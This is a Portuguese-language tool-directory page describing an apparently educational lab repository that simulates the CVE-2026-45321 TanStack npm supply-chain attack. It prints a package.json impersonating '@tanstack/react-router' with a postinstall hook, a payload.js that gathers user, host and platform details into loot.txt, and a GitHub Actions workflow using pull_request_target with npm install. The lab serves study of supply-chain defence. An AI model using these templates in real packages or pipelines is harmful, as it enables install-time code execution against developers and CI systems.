Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-45321-Tanstack — Laboratório educacional simulando ataques à cadeia de suprimentos do npm, abuso de CI/CD e execução de código no momento da instalação via CVE-2026-45321. Pesquisa prática de segurança defensiva para entender o comprometimento de dependências e a exploração de hooks de ciclo de vida. | Kitploit
Ferramentas/GitHubGitHub/renewablehacking/cve-2026-45321-tanstack
Análise de VulnerabilidadesAnálise de MalwareSegurança da Cadeia de SuprimentosAprendizado e EducaçãoLabs e Prática
GitHubrenewablehacking/cve-2026-45321-tanstack

CVE-2026-45321-Tanstack

Ver Repositório

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →

Sobre

Laboratório educacional simulando ataques à cadeia de suprimentos do npm, abuso de CI/CD e execução de código no momento da instalação via CVE-2026-45321. Pesquisa prática de segurança defensiva para entender o comprometimento de dependências e a exploração de hooks de ciclo de vida.

há 2 mesesAinda não revisado
Compartilhar

Simulação de Ataque à Cadeia de Suprimentos — CVE-2026-45321 (TanStack)

Laboratório Educacional para Entender Ataques à Cadeia de Suprimentos npm, Abuso de CI/CD e Execução de Código no Momento da Instalação

Aviso Legal

Este projeto foi criado apenas para:

  • aprendizado de segurança cibernética,
  • pesquisa de segurança defensiva,
  • simulação de laboratório local,
  • compreensão do conceito de ataque à cadeia de suprimentos.

Não use este projeto para:

  • atacar sistemas reais,
  • roubar credenciais,
  • implantar malware,
  • acesso não autorizado,
  • ou quaisquer outras atividades ilegais.

Descrição

Este laboratório simula o conceito básico dos incidentes:

  • CVE-2026-45321
  • Comprometimento da Cadeia de Suprimentos npm do TanStack
  • Abuso de GitHub Actions CI/CD
  • Execução de Scripts do Ciclo de Vida do npm

A simulação é feita localmente e de forma segura, sem:

  • roubo real de credenciais,
  • exfiltração de tokens,
  • ou comprometimento de serviços de terceiros.

Estrutura do Laboratório

root@kitploit:~
lab/
├── fake-repo/          # Simulação do repositório alvo
├── attacker-package/   # Simulação do pacote malicioso
└── victim-project/     # Simulação da vítima

Como Funciona a Simulação

root@kitploit:~
Attacker Package
        ↓
npm install
        ↓
script postinstall é executado
        ↓
payload.js é executado automaticamente
        ↓
Vítima sofre execução no momento da instalação

Conceitos Abordados

  • hooks do ciclo de vida do npm
  • execução arbitrária de código no momento da instalação
  • ataque à cadeia de suprimentos
  • limite de confiança de CI/CD
  • pacote npm malicioso
  • abuso do postinstall
  • comprometimento de dependências

Instalação

1. Clonar o Repositório

root@kitploit:~
git clone https://github.com/renewablehacking/CVE-2026-45321-Tanstack.git

cd CVE-2026-45321-Tanstack

Configuração do Pacote Atacante

2. Acessar a Pasta do Pacote Atacante

root@kitploit:~
cd attacker-package

3. Instalar Dependências

root@kitploit:~
npm install

4. Construir o Arquivo Tarball do Pacote

root@kitploit:~
npm pack

Resultado:

root@kitploit:~
tanstack-react-router-1.169.5.tgz

Simulação da Vítima

5. Acessar o Projeto da Vítima

root@kitploit:~
cd ../victim-project

6. Instalar o Pacote Malicioso

root@kitploit:~
npm install ../attacker-package/tanstack-react-router-1.169.5.tgz --foreground-scripts

Saída

Se bem-sucedido, a seguinte mensagem aparecerá:

root@kitploit:~
=== MALICIOUS PAYLOAD EXECUTED ===

e o arquivo:

root@kitploit:~
loot.txt

será criado automaticamente.


Exemplo de payload.js

root@kitploit:~
const os = require('os');
const fs = require('fs');

console.log("=== MALICIOUS PAYLOAD EXECUTED ===");

const info = `
USER=${process.env.USER}
HOST=${os.hostname()}
PLATFORM=${os.platform()}
`;

console.log(info);

fs.writeFileSync("loot.txt", info);

Exemplo de package.json

root@kitploit:~
{
  "name": "@tanstack/react-router",
  "version": "1.169.5",
  "scripts": {
    "postinstall": "node payload.js"
  }
}

Simulação de CI/CD

Este projeto também pode ser usado para entender:

  • GitHub Actions
  • pull_request_target
  • limite de privilégio de CI/CD
  • execução de dependências

Exemplo de workflow:

root@kitploit:~
name: CI

on:
  pull_request_target:

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4

      - run: npm install

Relação com CVE-2026-45321

Simulação no LaboratórioMundo Real
attacker-packagepacote TanStack comprometido
payload.jsinstalador malicioso

Referências

  • https://nvd.nist.gov/vuln/detail/CVE-2026-45321
  • https://tanstack.com/blog/npm-supply-chain-compromise-postmortem
  • https://docs.npmjs.com/cli/v10/using-npm/scripts
  • https://docs.github.com/en/actions/security-guides/security-hardening-for-github-actions

Apenas para Fins Educacionais

Este laboratório foi criado para aumentar a conscientização sobre:

  • segurança da cadeia de suprimentos,
  • segurança de dependências,
  • segurança de CI/CD,
  • e pesquisa de segurança defensiva.
Baixar ferramenta
postinstallabuso de hook do ciclo de vida
victim-projectdesenvolvedor/CI vítima
fake-repopipeline GitHub Actions